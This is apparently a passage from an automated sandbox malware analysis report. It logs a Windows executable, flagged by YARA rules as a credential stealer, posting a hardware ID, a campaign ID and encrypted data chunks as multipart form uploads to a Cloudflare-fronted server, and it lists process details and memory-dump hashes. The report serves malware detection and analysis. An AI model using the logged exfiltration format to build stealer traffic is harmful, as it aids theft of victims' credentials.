2024-12-20 15:39:49 UTC  15331              OUT        Data Raw: 2d 2d 4b 49 31 42 42 4b 53 4a 33 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 39 42 37 37 39 36 44 35 30 31 31 36 38 46 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 4b 49 31 42 42 4b 53 4a 33 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4b 49 31 42 42 4b 53 4a 33 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 4b 49 31 42 42 4b 53 4a 33 42 0d 0a 43 6f 6e 74 65 6e 74 2d
Data Ascii: --KI1BBKSJ3BContent-Disposition: form-data; name="hwid"79B7796D501168FCAC8923850305D13E--KI1BBKSJ3BContent-Disposition: form-data; name="pid"1--KI1BBKSJ3BContent-Disposition: form-data; name="lid"PsFKDg--pablo--KI1BBKSJ3BContent-
                                                                                                                                              2024-12-20 15:39:49 UTC15331OUTData Raw: 81 bf 04 dd e0 7d 7c 7e dc 0f 39 8c 0f b8 39 a4 33 01 28 4c a9 cf fa 96 a8 d0 e5 6b 33 bd 10 11 c9 e7 8d 8c 62 c1 e5 06 32 24 77 03 bd a4 ae 34 79 9e d4 43 00 47 36 b2 05 6b 44 93 23 1c 94 2b c3 03 12 8c ef 94 46 de 36 1c 74 86 ec 94 e6 b2 db 6c 72 d1 e3 ee 42 4f 63 37 da a1 a8 16 a6 1c f7 8a e8 df a7 1b 07 83 60 4f d8 dd 73 e6 60 7a 6d 69 7d 38 1f 5a 47 c2 3c 24 cd b6 e3 62 14 c7 ed ed 14 7a c4 aa 92 9f 5d b1 69 8e f8 12 f0 4d c4 69 84 32 b1 fe f1 06 fa 90 de f3 53 f1 26 b1 db 77 05 49 2d ba 82 1a 7f 35 f5 32 a4 5d df 37 7e c0 ae cb f0 9b ba dc c4 87 c8 3d 5f a4 47 f8 0e 44 7b c4 12 2f 9b 67 15 82 02 33 7e 93 c0 0b 1c f2 bc e0 61 bb a6 e5 8e 1a e1 1c 85 e9 63 7c c3 bf 5d 65 12 f9 f9 45 58 4f 8f 33 a5 9a 74 17 9e ac 3a e0 c0 06 8e 75 89 32 a0 86 ae 2c 86
                                                                                                                                              Data Ascii: }|~993(Lk3b2$w4yCG6kD#+F6tlrBOc7`Os`zmi}8ZG<$bz]iMi2S&wI-52]7~=_GD{/g3~ac|]eEXO3t:u2,
                                                                                                                                              2024-12-20 15:39:49 UTC15331OUTData Raw: ac 7a 5a a0 d3 49 ed 7a 35 dd ea b4 65 7f b0 97 71 ba 41 9e 50 cd 7d f4 ed 4a 43 c9 7c d5 dd ae bc 6f 8f 18 d3 a2 31 a5 28 d7 64 b5 a7 f6 b3 7e f3 44 4f 36 04 1d 04 fa 34 5d 19 f7 f8 36 9b 94 e3 18 5f cb 0e 2e 26 a8 a4 21 c8 69 fb c5 4c cb 7b 68 be b2 31 4f 04 f3 16 53 27 1e d0 93 75 c7 4e 4e ec d2 42 c3 68 42 88 7e 1b a6 bc 89 9c fd 41 87 f0 6e f3 2a 43 df 3d 4d 8c 17 f5 8e a7 ff 50 34 bc 42 7b 54 ce 5e 1e ec b6 09 91 23 49 1d 20 b8 99 f8 50 e4 e5 64 43 a2 96 de 9a 9e 90 0e d5 b1 6b d5 c5 f3 9f 94 df eb b1 9d a3 d8 da cc 3b ae 27 d9 7e 8f 4e e6 bb a7 68 3e 41 1c 2f 44 a2 21 be 6d ca 89 70 3e 81 55 b9 ae 05 81 dd 35 52 87 5f 72 ca 1f 46 91 a4 50 02 fb fa 9b 88 82 e5 98 db 51 53 a8 97 ee 72 e4 3c be 99 92 7a 2f 94 0e ff 64 49 22 5b 94 b3 a8 a3 3f 21 f7 7b
                                                                                                                                              Data Ascii: zZIz5eqAP}JC|o1(d~DO64]6_.&!iL{h1OS'uNNBhB~An*C=MP4B{T^#I PdCk;'~Nh>A/D!mp>U5R_rFPQSr<z/dI"[?!{
                                                                                                                                              2024-12-20 15:39:49 UTC15331OUTData Raw: bd 20 a6 00 92 6d 9d e7 f2 4c 91 a6 3f 01 bd 87 40 7d 07 28 ad 6b 33 16 8c 6b 2c f7 bd 80 b2 1d c7 1d d4 74 ab ef 22 98 66 c1 4d 1a 99 00 52 b5 6b 4f 7e 24 d0 bb f7 35 93 89 08 96 bd fa bf 83 a8 62 c8 52 11 94 49 2c 34 b9 e5 5d 09 50 92 89 de 83 84 fa 32 30 86 dd 80 5e c8 fb 80 06 06 3b c0 ad 48 12 06 4a 3a 37 98 0d 6f bb 56 4d 4d 5c 31 b0 ef 90 59 fc cc c8 8e 85 30 ab 71 55 da fb 20 6d 6e 9b 25 a1 65 0d 35 0d 7f 3b a8 14 9d ab 4b 17 5e 2d 01 ad c6 e8 43 91 83 91 0a e8 77 0c 1d 21 80 58 04 82 2d aa 8b b6 54 f4 59 d7 43 e4 82 43 a9 14 7b af f5 2e 05 9a e2 da a9 15 b5 73 7d 51 e9 2b 72 1b 5c 20 10 a5 c5 cf 91 17 2e 5d 00 13 c8 c4 72 9e f4 08 82 eb c1 56 6b 71 92 af d3 f0 02 52 fc 97 5a e8 8c 77 2b 22 b3 9f 34 0a 34 03 b8 f7 2d c8 15 58 61 a9 53 e7 af 58 68
                                                                                                                                              Data Ascii: mL?@}(k3k,t"fMRkO~$5bRI,4]P20^;HJ:7oVMM\1Y0qU mn%e5;K^-Cw!X-TYCC{.s}Q+r\ .]rVkqRZw+"44-XaSXh
                                                                                                                                              2024-12-20 15:39:49 UTC15331OUTData Raw: 68 30 28 12 33 c5 b4 a6 05 a9 12 55 a2 12 97 2f 09 c7 57 20 64 96 27 4c c9 b3 b2 5a 0f 67 1b 0d dc 2d cd be 3d 88 b8 de 99 56 98 7b 32 e6 87 47 c1 f6 5e cf 69 87 dc ca 1b 4c 1c 3d 48 e4 0c 70 dc 86 95 1c cb 7a 10 4a 17 77 cc ad 3a 0d 7f 6e 95 18 63 93 d4 58 b5 62 79 dd a1 2a 34 14 73 e3 0c ee 3f 8b ea 8f bc 0c 72 12 d2 4b 72 30 48 75 fc 62 a5 83 2b 64 bc c0 2c e5 3d d0 c7 98 d8 78 e4 cc 59 c1 7f df a0 2b 8d 7d 71 c8 de 8b 27 d9 3a 31 4d 9a 52 fd e5 5d 64 20 e4 53 4f 6f 41 fe 92 65 d5 cd 6e 9b a9 16 59 c5 2d 49 23 af 9a e7 58 9a 4f 71 db 66 b5 23 45 77 c5 5e 30 2e 4a d9 4c 4c 9c bd d9 7d cd 0a 4e 4d 03 bf 92 f2 92 2a 65 17 63 a1 ac a0 39 27 f8 b3 ad da 32 7f 08 7b 5b 10 2d 3c c5 80 14 d7 49 8e e8 c5 1b 34 2b 2c 5e 72 70 8d 8c f9 b7 16 1a 8c 05 45 30 a4 64
                                                                                                                                              Data Ascii: h0(3U/W d'LZg-=V{2G^iL=HpzJw:ncXby*4s?rKr0Hub+d,=xY+}q':1MR]d SOoAenY-I#XOqf#Ew^0.JLL}NM*ec9'2{[-<I4+,^rpE0d
                                                                                                                                              2024-12-20 15:39:49 UTC15331OUTData Raw: 55 33 a2 03 6b 0c c3 1a 7e 21 0b e4 a7 02 5d f4 c7 fe a8 9f dc a3 dd 56 74 fe 6b 6e da 4a e1 82 38 01 fc 72 68 ad 45 43 9c 00 a7 f8 8c 2c 45 e9 a0 64 97 32 94 f6 38 d0 db d9 a5 49 a0 69 71 b2 bb 08 8f 7f 5b 8d f4 7d 45 52 05 bf 21 a5 cd 08 58 ea b4 b5 f0 dc 3c 1d 9c a2 02 1b 5a 21 30 f2 9d 68 41 34 ab 93 2a 5b 7a 1b 20 4d 01 2d db 41 14 60 2f 15 64 f3 d6 b5 13 09 40 76 b3 92 f7 48 8d 02 ae d7 7b df a9 a0 2f b3 fd 58 1c 48 79 14 1e d2 f4 28 fc 12 60 66 ed 06 0f 65 99 da 45 b2 ff 73 9a ca 20 03 90 9f e4 19 27 2d e8 62 0a a8 07 9e 9c 0f d5 79 a6 94 73 79 eb 19 9d c2 6f 52 65 ba d7 68 a1 fa f6 8d 22 ac f7 91 30 7e f6 f5 ff cc 05 31 70 67 e9 9f 00 06 32 a2 ff 2b c8 6c c1 d5 f0 df 21 68 98 53 01 36 b0 70 a7 b8 c1 75 e0 70 76 ab 04 2a b2 f2 20 0c 41 af df 18 c2
                                                                                                                                              Data Ascii: U3k~!]VtknJ8rhEC,Ed28Iiq[}ER!X<Z!0hA4*[z M-A`/d@vH{/XHy(`feEs '-bysyoReh"0~1pg2+l!hS6pupv* A
2024-12-20 15:39:52 UTC 1133 IN HTTP/1.1 200 OK
Date: Fri, 20 Dec 2024 15:39:52 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=g7d0edjqt4ohjvqr437j025tiv; expires=Tue, 15 Apr 2025 09:26:30 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FKCeZyFHy30Qsh6zb5MDMWqJ8CdbeiE4FdhN%2BAMwBTAPYQaq%2F8vu60T7xCJkIOqJvtIbm0PFZfny6WWq%2FdXVQKoxpIx08MkJapsFBRoFdjOhkn3g75wxMxRX5YrEi0CTcg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f50ba332fa75e86-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1759&min_rtt=1754&rtt_var=669&sent=282&recv=593&lost=0&retrans=0&sent_bytes=2833&recv_bytes=573265&delivery_rate=1623123&cwnd=240&unsent_bytes=0&cid=a862ddb647e1ba84&ts=3437&x=0"



Target ID: 0
Start time: 10:39:15
Start date: 20/12/2024
Path: C:\Users\user\Desktop\gJkNLYV0ax.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\gJkNLYV0ax.exe"
Imagebase: 0xe60000
File size: 1'880'064 bytes
MD5 hash: F158CDB34EB5C4DE5EB858CCE72F94CB
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1998585611.0000000001A3C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1998932614.00000000019F1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1998797783.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1998637407.00000000019E5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Strings
Memory Dump Source
• Source File: 00000000.00000003.2026210139.0000000001A57000.00000004.00000020.00020000.00000000.sdmp, Offset: 01A57000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_1a57000_gJkNLYV0ax.jbxd
Similarity
• API ID:
• String ID: C:\W$Inte
• API String ID: 0-108695081
• Opcode ID: a946a84af9a8b469fe1e93faf2e8910245474469ff3c4a08d3b4ea5491fe641e
• Instruction ID: 04f10041865101771ab2882346cdf324838a38b8a9d42d3c1bdc1932871ebfc4
• Opcode Fuzzy Hash: a946a84af9a8b469fe1e93faf2e8910245474469ff3c4a08d3b4ea5491fe641e
• Instruction Fuzzy Hash: 9581866240E7C15FC7939B765D664AA3FB1AE2362030E41CBCAC1CF1B3D52D191ADB62
Memory Dump Source
• Source File: 00000000.00000003.2026210139.0000000001A46000.00000004.00000020.00020000.00000000.sdmp, Offset: 01A46000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_1a3c000_gJkNLYV0ax.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e04ad489d6de3e8e1d0f5cd0b41409b58730923419c4d4a7dd5c9db23f2af793
• Instruction ID: e366bb0bdceb58d66d1f93ed2381eae680ba1133aca6ccec986b9d7e6dc68200
• Opcode Fuzzy Hash: e04ad489d6de3e8e1d0f5cd0b41409b58730923419c4d4a7dd5c9db23f2af793
• Instruction Fuzzy Hash: 5602376244E3C19FD7578B748C2A695BFB0AF63220B1E81DFC485CF0B3D259884AD726
Memory Dump Source
• Source File: 00000000.00000003.2026210139.0000000001A46000.00000004.00000020.00020000.00000000.sdmp, Offset: 01A46000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_1a3c000_gJkNLYV0ax.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 82e15745398a79462fc3f387014c57c54e42a491e1e86e4f16952d39ae780a99
• Instruction ID: 1283c69bf1a6843104143cf63764d1370e4592f3caa5d942198852fc268066b1
• Opcode Fuzzy Hash: 82e15745398a79462fc3f387014c57c54e42a491e1e86e4f16952d39ae780a99
• Instruction Fuzzy Hash: BDF1376644E3C19FD7578B748C2A6957FB0AF63220B1E81DFC481CF0B3E259894AD762